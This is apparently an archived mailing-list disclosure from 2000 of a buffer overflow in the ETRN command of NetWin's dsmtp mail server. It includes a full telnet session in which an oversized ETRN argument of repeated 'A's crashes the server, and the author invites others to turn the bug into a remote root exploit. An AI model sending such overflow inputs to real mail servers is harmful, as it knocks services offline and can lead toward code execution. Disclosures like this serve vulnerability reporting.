I've been sitting on this for a while, but dsmtp ( Part of
the dmail package by NetWin, http://www.netwinsite.com ) has
a buffer overflow in the ETRN command, causing the server to
crash and dump core. I've contacted NetWin and they are
working on the problem, but 3 new Betas have been released
since and still the problem isn't fixed, so I figure I might
as well put it up.
----------------
NotNow>telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 myhost.mydomain DSMTP ESMTP Server v2.8g
EHLO ""
250-myhost.mydomain. Hello "" (127.0.0.1)
250-ETRN
250-DSN
250 HELP
ETRN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.
NotNow>
NotNow>cd /usr/local/dmail
NotNow>ls -la core
-rw------- 1 root root 1961984 Jun 1 13:42 core
NotNow>
---------------------
A little over 260 A's would cauase the crash. I don't know
if someone wants to attempt a remote root exploit, but I'd
be interested to see it as I haven't been successful yet.
(Not exactly the most experienced coder in the world..
Skills just better then a rock.. But at least I'll admit
it). But this is at least a stupid little DoS.
Regards,
Eric Andry
Received on Jun 01 2000
Intro
